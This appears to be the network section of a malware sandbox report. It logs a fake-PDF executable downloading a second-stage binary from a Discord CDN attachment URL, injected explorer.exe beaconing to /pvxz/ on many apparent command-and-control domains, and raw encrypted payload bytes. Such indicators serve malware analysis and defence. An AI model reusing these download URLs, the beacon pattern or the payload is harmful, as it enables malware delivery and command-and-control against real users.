                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="TEXT/HTML; CHARSET=utf-8"/><title>Error</title></head><body><H2>Error</H2><table summary="Error" border="0" bgcolor="#009933" cellpadding="0" cellspacing="0" width="400"><tr><td><table summary="Error" border="0" cellpadding="3" cellspacing="1"><tr valign="top" bgcolor="#009933" align="left"><td><STRONG><font color="white">This is not the web page you are looking for.</font></STRONG></td></tr><tr valign="top" bgcolor="#FFFFFF"><td>This page can't be displayed. Please use the correct URL address to access<br/>The incident ID is:N/A.</td></tr></table></td></tr></table></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            17 192.168.2.3 49846 2.57.90.16 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:50.583769083 CET 8678 OUT GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh HTTP/1.1
                                                                            Host: www.sa-pontianak.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:26:50.619972944 CET 8679 IN HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 01 Dec 2021 15:26:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            18 192.168.2.3 49847 15.197.142.173 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:55.689368963 CET 8680 OUT GET /pvxz/?e0DDHLix=AMbF+Q/e/AO7yIAHRf5aUfsWvc/33vy+f/8PmVMiF5qZYbHgDNTXzprpLW2ZF4YvRkgO&8pqLWR=BzrlN6PpwXh HTTP/1.1
                                                                            Host: www.localproperty.team
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:26:55.888065100 CET 8680 IN HTTP/1.1 403 Forbidden
                                                                            Server: awselb/2.0
                                                                            Date: Wed, 01 Dec 2021 15:26:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 118
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            19 192.168.2.3 49848 156.67.222.132 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:27:07.094609022 CET 8681 OUT GET /pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh HTTP/1.1
                                                                            Host: www.tourbox.xyz
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:27:07.285655975 CET 8682 IN HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            last-modified: Tue, 25 Jun 2019 07:07:19 GMT
                                                                            etag: "999-5d11c827-698982c0c6efc961;;;"
                                                                            accept-ranges: bytes
                                                                            content-length: 2457
                                                                            date: Wed, 01 Dec 2021 15:27:07 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
                                                                            Dec 1, 2021 16:27:07.285675049 CET 8684 IN
                                                                            Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
                                                                            Dec 1, 2021 16:27:07.285686970 CET 8684 IN
                                                                            Data Ascii: </div> </div></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            2 192.168.2.3 49754 162.159.129.233 443 C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            3 192.168.2.3 49757 162.159.130.233 443 C:\Users\user\Contacts\Wkklnmcz.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            4 192.168.2.3 49807 23.224.31.114 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:24:49.547094107 CET 8578 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+ HTTP/1.1
                                                                            Host: www.ncgf08.xyz
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:24:49.708903074 CET 8579 IN HTTP/1.1 301 Moved Permanently
                                                                            Server: nginx
                                                                            Date: Wed, 01 Dec 2021 15:24:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 162
                                                                            Connection: close
                                                                            Location: https://www.ncgf08.xyz/pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+
                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            5 192.168.2.3 49808 2.57.90.16 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:24:54.802287102 CET 8580 OUT GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj HTTP/1.1
                                                                            Host: www.sa-pontianak.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:24:54.839745045 CET 8580 IN HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 01 Dec 2021 15:24:54 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            6 192.168.2.3 49809 154.81.158.75 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:25:00.226923943 CET 8581 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9 HTTP/1.1
                                                                            Host: www.hbjngs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:25:00.421998024 CET 8582 IN HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 01 Dec 2021 15:24:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 1968
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#23567;&#20185;&#22899;&#33258;&#24944;&#21627;&#21535;&#27969;&#30333;&#27974;,&#22826;&#31895;&#22826;&#30828;&#23567;&#23521;&#22919;&#21463;&#19981;&#20102;,&#124;&#51;&#55;&#26085;&#26412;&#32905;&#20307;&#25668;&#24433;,&#26085;&#26412;&#88;&#88;&#88;&#88;&#33394;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;</title><meta name="keywords" content="&#23567;&#20185;&#22899;&#33258;&#24944;&#21627;&#21535;&#27969;&#30333;&#27974;,&#22826;&#31895;&#22826;&#30828;&#23567;&#23521;&#22919;&#21463;&#19981;&#20102;,&#124;&#51;&#55;&#26085;&#26412;&#32905;&#20307;&#25668;&#24433;,&#27431;&#32654;&#24615;&#33394;&#27431;&#32654;&#31934;&#21697;&#35270;&#39057;&#54;&#57;" /><meta name="description" content="&#23567;&#20185;&#22899;&#33258;&#24944;&#21627;&#21535;&#27969;&#30333;&#27974;,&#22826;&#31895;&#22826;&#30828;&#23567;&#23521;&#22919;&#21463;&#19981;&#20102;,&#124;&#51;&#55;&#26085;&#26412;&#32905;&#20307;&#25668;&#24433;,&#20813;&#36153;&#22269;&#20135;&#25104;&#20154;&#39640;&#28165;&#22312;&#32447;&#32593;&#31449;,
                                                                            Dec 1, 2021 16:25:00.422022104 CET 8583 IN
                                                                            Data Ascii: &#24040;&#33016;&#32654;&#20083;&#26080;&#30721;&#20154;&#22971;&#35270;&#39057;,&#22269;&#20135;&#31934;&#21697;&#26377;&#30721;&#26080;&#30721;&#65;&#86;&#22312;&#32447;&#25773;&#25918;,&#20122;&#27954;&#22270;&#29255;&#26657;&#22253;&#21478
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            7 192.168.2.3 49810 163.44.239.73 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:25:06.424876928 CET 8584 OUT GET /pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj HTTP/1.1
                                                                            Host: www.sumikkoremon.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:25:06.902086020 CET 8585 IN HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            link: <https://sumikkoremon.com/wp-json/>; rel="https://api.w.org/"
                                                                            content-length: 5784
                                                                            date: Wed, 01 Dec 2021 15:25:06 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1" /><link media="all" href="http://sumikkoremon.com/wp-content/cache/autoptimize/css/autoptimize_f9f0edcdee70dcc6826f3a80e2553fc4.css" rel="stylesheet" /><title></title><meta name="robots" content="noindex,nofollow"><link rel="canonical" href="https://sumikkoremon.com/404"><link rel="shortcut icon" href=""> ...[if IE]><link rel="shortcut icon" href=""> <![endif]--><link rel="apple-touch-icon" href="" /><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//sumikkoremon.com' /><link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /><link href='https://fonts.gstatic.com' crossorigin='anonymous' rel='preconnect' /><link href='https://ajax.googleapis.com' rel='preconnect' /><link href='https://fonts.googleapis.com' rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="
                                                                            Dec 1, 2021 16:25:06.902127981 CET 8587 IN
                                                                            Data Ascii: &raquo; " href="https://sumikkoremon.com/feed" /><link rel="alternate" type="application/rss+xml" title=" &raquo; " href="https://sumikkoremon.
                                                                            Dec 1, 2021 16:25:06.902143955 CET 8588 IN
                                                                            Data Ascii: er_small_content"><div id="description"></div><nav class="header_small_menu_right" role="navigation" itemscope="itemscope" itemtype="http://scheme.org/SiteNavigationElement"></nav></div></div><div class="header-logo
                                                                            Dec 1, 2021 16:25:06.902160883 CET 8589 IN
                                                                            Data Ascii: </div><form role="search" method="get" class="searchform" class="notfofund_search aligncenter" action="https://sumikkoremon.com/" > <input type="text" placeholder="" value="" name="s" class="s" /> <input type
                                                                            Dec 1, 2021 16:25:06.902179956 CET 8590 IN
                                                                            Data Ascii: cript> <script src='https://stats.wp.com/e-202148.js' defer></script> <script>_stq = window._stq || [];_stq.push([ 'view', {v:'ext',j:'1:10.1',blog:'197750087',post:'0',tz:'0',srv:'sumikkoremon.com'} ]);_stq.push([ 'clickTrackerInit', '197
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            8 192.168.2.3 49820 156.67.222.132 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:25:12.185509920 CET 8614 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv HTTP/1.1
                                                                            Host: www.tourbox.xyz
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:25:12.374897957 CET 8618 IN HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            last-modified: Tue, 25 Jun 2019 07:07:19 GMT
                                                                            etag: "999-5d11c827-698982c0c6efc961;;;"
                                                                            accept-ranges: bytes
                                                                            content-length: 2457
                                                                            date: Wed, 01 Dec 2021 15:25:12 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
                                                                            Dec 1, 2021 16:25:12.374916077 CET 8619 IN
                                                                            Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
                                                                            Dec 1, 2021 16:25:12.374927044 CET 8619 IN
                                                                            Data Ascii: </div> </div></body></html>
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            9 192.168.2.3 49835 68.70.164.19 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:25:22.680155993 CET 8653 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq HTTP/1.1
                                                                            Host: www.jardingenesis.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:25:22.792427063 CET 8654 IN HTTP/1.1 404 Not Found
                                                                            Date: Wed, 01 Dec 2021 15:25:22 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

                                                                            HTTPS Proxied Packets

                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            0 192.168.2.3 49750 162.159.129.233 443 C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            2021-12-01 15:22:56 UTC 0 OUT GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1
                                                                            User-Agent: lVali
                                                                            Host: cdn.discordapp.com
                                                                            2021-12-01 15:22:56 UTC 0 IN HTTP/1.1 200 OK
                                                                            Date: Wed, 01 Dec 2021 15:22:56 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 281088
                                                                            Connection: close
                                                                            CF-Ray: 6b6d50552cf005bb-FRA
                                                                            Accept-Ranges: bytes
                                                                            Age: 36009
                                                                            Cache-Control: public, max-age=31536000
                                                                            Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb
                                                                            ETag: "95c7205834a4a92a4f9bfc212c2326dc"
                                                                            Expires: Thu, 01 Dec 2022 15:22:56 GMT
                                                                            Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: HIT
                                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                            x-goog-generation: 1638333470898312
                                                                            x-goog-hash: crc32c=meGuLw==
                                                                            x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A==
                                                                            x-goog-metageneration: 1
                                                                            x-goog-storage-class: STANDARD
                                                                            x-goog-stored-content-encoding: identity
                                                                            x-goog-stored-content-length: 281088
                                                                            X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ
                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                            2021-12-01 15:22:56 UTC 1 IN
                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F9hNGbiFXfL3eHZL1K1Ku%2FVD7L8KVcswlPehYAUcAD7%2BDqmQah4J50gc4irRRdGZcE9onBqSvT0SjmOehwruM0MiHq%2B%2FON4Y2Pwfvdgvn%2FTZ7wSYjBJQn5ts11%2FPEdf%2F94E%2BDg%3D%3D"}],"group":"cf-nel
                                                                            Data Ascii: \1t,\}w}<*PN4V+rOe+rc@{]k3\tksc4Y&.I:xKiw 93$fQ$k8LqlA.=+NhL/I&YIDH4df88V=,bhjoD,VA&:tqR5e6o5,[./_U7#
                                                                            2021-12-01 15:22:56 UTC 33 IN Data Raw: ed 71 b6 47 2f 84 04 ea 3b 76 78 12 f8 26 95 f0 33 c5 c5 6e ee b6 88 fb 07 ba a9 8c a8 a6 85 27 34 5a b7 38 72 15 04 a8 d6 e5 88 37 00 58 3a 0b 82 c5 14 ae 27 a5 e7 18 6f 82 ba 32 55 3f 3d 09 f0 a0 0c f7 dd 94 ab 84 cd 30 ac dd 46 95 d7 67 da 8f c3 c3 6f 78 8a ff d5 6d 75 06 63 07 8a d5 2a 10 13 9e 65 c3 30 51 f6 c3 45 0d 66 3f a9 2e b2 85 bb a3 9a 5f c5 3a 00 c3 5c d2 ee f4 47 c7 49 f5 91 4b fe 4a 8c be ca d4 69 ff db 90 58 39 1f b9 2c 5b b4 4a 10 62 38 17 c4 67 65 57 49 10 c2 34 25 58 35 be 20 74 f6 56 a8 9a b2 63 be 02 c8 0a e9 a2 63 5a 59 b3 94 41 03 74 e6 fe 8a b5 a6 6d 75 90 48 c2 e1 50 a7 ec be 7a 07 ac 84 a2 40 73 62 cd 4a 6f 9b b0 d1 a0 75 9b 6c c6 7b 8a 2b d1 81 36 e2 1e 34 4d 18 ff 75 fc a9 d5 f7 4d 00 cc c5 54 8f bf c0 a6 63 db a3 46 09 56 6d
                                                                            Data Ascii: qG/;vx&3n'4Z8r7X:'o2U?=0Fgoxmuc*e0QEf?._:\GIKJiX9,[Jb8geWI4%X5 tVccZYAtmuHPz@sbJoul{+64MuMTcFVm
                                                                            2021-12-01 15:22:56 UTC 34 IN Data Raw: 2f d7 03 d8 77 15 9d fc 49 94 b8 14 2e 4f 32 57 2b 4d 7b 48 99 46 0f 72 e2 0b 69 43 f0 d8 71 21 44 fc e4 87 20 7c 1f ea 39 8e b6 2e 0b e9 c2 34 44 9e 78 f0 d5 dc 7a c1 40 7f 8c 3a 9c eb 21 e1 8e 5b 5a 5e 78 50 72 7b 1d c8 c4 ce fb 89 e8 df 9a 50 34 9f ef 31 e4 46 93 d3 76 e0 82 b6 fc a4 cb 2d 2d b7 a8 d4 0f 9a b2 9e 1b 3d 98 d0 fc b7 30 7b 0e 16 8c 24 9c 7d e4 8a 2e d9 60 59 2d 06 66 5d 5b 19 f6 b4 b0 99 45 7f 6f f1 2b 97 c8 cc c7 aa 59 3e a1 2d 04 3c 90 1e 2f f8 4f 3a e0 24 37 16 72 f3 0d 63 42 1b df 81 20 04 ef 37 8a 29 d5 7f 12 4c c7 49 04 e1 76 d2 f6 9a 93 05 ab e8 71 11 f6 56 ae 13 fe 5a 46 ac f5 79 80 01 d8 86 3f 75 f6 4f af 6a fe 49 1b 32 dd a6 6f 76 14 f4 9a 5f 97 0d a1 2b 23 d1 57 15 83 a6 f1 92 4a 66 b0 a0 d4 fe 5f ce 8e 46 17 b3 14 8f 4f 38 70
                                                                            Data Ascii: /wI.O2W+M{HFriCq!D |9.4Dxz@:![Z^xPr{P41Fv--=0{$}.`Y-f][Eo+Y>-</O:$7rcB 7)LIvqVZFy?uOjI2ov_+#WJf_FO8p
                                                                            2021-12-01 15:22:56 UTC 36 IN Data Raw: 19 71 14 10 63 53 36 b3 f4 d3 25 69 70 f0 26 d9 f4 d4 9a a7 df 2e a9 08 ed 23 20 69 89 24 d4 90 84 d9 93 ab 39 e7 83 b2 08 6e 81 5c 4e 3f 93 12 f2 d4 94 7b 98 4b 1a 92 61 f6 ec db 89 7e 0b b4 23 5b 59 bb f0 5f 8e 81 63 e9 66 df ac 9d fa 57 26 c4 4e 78 f5 a2 8d 9e 15 7b 96 4f de e5 64 8d e0 f8 53 36 e2 60 c3 6f 7f 87 b7 36 94 b3 ec a2 28 b6 d3 0d 89 dc d1 51 08 60 41 97 0c 2a f3 a1 dd 62 54 c7 d2 b0 08 ed bd 33 38 83 37 25 b2 01 d5 2f 2e bc 13 ee 60 6d 3a 76 1e af 62 db 11 a5 38 62 22 d5 e0 5d a5 d1 e5 1f d1 6a ff c4 21 23 5c 9e 8b 99 6f 22 29 d9 f2 19 98 ba fa 53 ab 84 3e fc cc fc 46 80 18 ca d7 61 56 a7 04 b3 21 40 65 42 09 f0 6a fe 42 90 bb b7 1e 78 1a 18 02 0d 18 0b 81 bd 21 29 ba a5 d5 e8 39 f5 da 74 23 17 8b 34 d3 07 7f 9d fc a4 85 49 43 bb 48 8b a5
                                                                            Data Ascii: qcS6%ip&.# i$9n\N?{Ka~#[Y_cfW&Nx{OdS6`o6(Q`A*bT387%/.`m:vb8b"]j!#\o")S>FaV!@eBjBx!)9t#4ICH
                                                                            2021-12-01 15:22:56 UTC 37 IN Data Raw: 8b a5 e4 09 79 90 c9 46 18 4b 17 f5 7d 9d cc a2 61 c1 53 9f f4 51 30 d8 35 fe 5d 2c 4c d0 c3 35 fc 4f 31 4c 52 a3 79 a2 c8 90 80 8c cd d3 83 ba d9 06 e8 a6 9f fc da 99 c9 3a cd 22 b3 d6 fe 7a 3e 7c 9b 60 d1 ef 9b 49 68 ea 52 3b 66 c2 c1 56 b0 b0 b8 8d ad 00 c2 4c 70 fa c9 6e 03 2d 1d 20 ca 4f 46 a0 14 06 73 ea 31 52 36 77 09 5e dd f6 e6 68 60 2e 57 8a 6c e5 e7 0d 94 44 11 74 ed 80 65 41 0c 82 20 68 ce cf 79 91 da 65 ca c3 c1 df 86 11 47 80 ef 3c 99 db 1e e8 32 7d a6 70 78 1a 0d 1e 9f fc d3 f8 43 b7 5a b8 cb dd 07 7b 19 15 82 00 a3 ee 34 2a 4e 3a 49 3f e4 03 7c 93 27 ad 8a 47 0b 3b 36 f9 28 d3 f0 2f 41 94 44 fa 6e f4 cb 34 c0 57 29 40 bf 28 53 4b a9 6b ca b4 8a 4d 00 d9 2e de e2 1a 19 83 b5 5b 71 17 82 27 af 90 d7 63 d9 e9 b4 2b e7 78 4f ed 21 44 03 9b fc
                                                                            Data Ascii: yFK}aSQ05],L5O1LRy:"z>|`IhR;fVLpn- OFs1R6w^h`.WlDteA hyeG<2}pxCZ{4*N:I?|'G;6(/ADn4W)@(SKkM.[q'c+xO!D
                                                                            2021-12-01 15:22:56 UTC 38 IN Data Raw: ac de 90 10 ac 06 0e 0b f7 53 2b 24 c1 cb 9b e4 e3 13 5f 50 0a db f3 21 ce 57 9c f6 dd a8 1d d3 fc c1 d1 fa 3d 64 af 96 c0 20 bb 18 86 0e 9d 72 7d 6f 09 f7 e0 ea c4 23 4e d7 e1 f0 d4 10 e4 f9 b8 37 b3 f7 28 9e a5 8d 37 8b 64 1f 79 57 12 80 74 2b 17 57 e3 e5 0b 2a 99 00 07 b3 64 56 e7 47 df 56 78 26 a9 50 7c d6 3f 2f fd 40 26 f3 62 17 5a cb cd 49 ae 29 7b 3e 5f db 91 66 63 fb 6e 81 3d f7 64 7f 32 fe de 16 d0 27 ec 29 4c 0b 62 d8 d9 8e 42 f9 95 d4 f2 43 eb 41 2a cf 76 0f a0 8d aa 8e 66 3e 6c f9 49 46 8b 92 1d a2 43 50 b4 ab 6f 71 00 33 35 c8 5b a5 e3 96 29 37 ef ae 95 a9 ea 2f d0 61 03 6e da a8 89 a6 17 90 23 a1 9b f7 e3 79 64 fe d1 86 34 56 9b 0b 6d 63 d0 b4 0a fe 7d 73 8e 63 c0 43 02 6c 9a 53 b7 0d 73 ce 9b 24 09 e5 7a 02 43 24 f6 ab 07 4d b2 22 18 45 05
                                                                            Data Ascii: S+$_P!W=d r}o#N7(7dyWt+W*dVGVx&P|?/@&bZI){>_fcn=d2')LbBCA*vf>lIFCPoq35[)7/an#yd4Vmc}scClSs$zC$M"E
                                                                            2021-12-01 15:22:56 UTC 40 IN Data Raw: e1 cc 2a ac f2 17 6b e4 4f b5 43 0e 04 fa 57 d7 96 da 33 dc b7 31 7e 6f 09 af dd 54 75 8c 6c c9 5d 5f c6 bc 93 a0 9e 6c 99 51 2f 4a 91 e7 91 b4 2b b1 af 37 62 cb f9 45 9b ec 3a 63 50 bc 30 de 1a 05 76 1a 05 c2 5b 50 bb 21 bd 2a 8b cf de 2d 5e 87 be bc ac 9c 78 72 74 fe 46 8f d3 74 f1 9b a9 00 c3 59 2e 5e cb 20 a9 b8 a8 06 be ab 0c e3 05 b0 88 ae 0c 8f c5 5a a7 e1 05 e4 95 d7 6f 60 c3 5a 30 1b 1e 3d f1 a2 61 cd 1b ac 85 ae 88 2e f4 de 8e e7 84 3d ee 2b 65 44 97 da e3 58 92 f6 61 f4 2f a9 9c 75 90 4a 93 d7 d3 f6 57 ff 18 93 07 6d 8b e7 9a de 92 c2 d3 7e 18 09 e7 6a 4c 9c 4e 28 db 8f db 9e 7d 83 8f 99 d2 c8 ad ab 17 8b ab 07 61 73 f9 c6 dc 02 f8 44 a4 f8 cf 65 5e d1 77 83 de 41 a6 66 c6 d5 68 ea 02 95 4a 1e 25 ad 0f 93 cb d8 19 9a 54 84 c1 de 46 2c 5a ba bf
                                                                            Data Ascii: *kOCW31~oTul]_lQ/J+7bE:cP0v[P!*-^xrtFtY.^ Zo`Z0=a.=+eDXa/uJWm~jLN(}asDe^wAfhJ%TF,Z
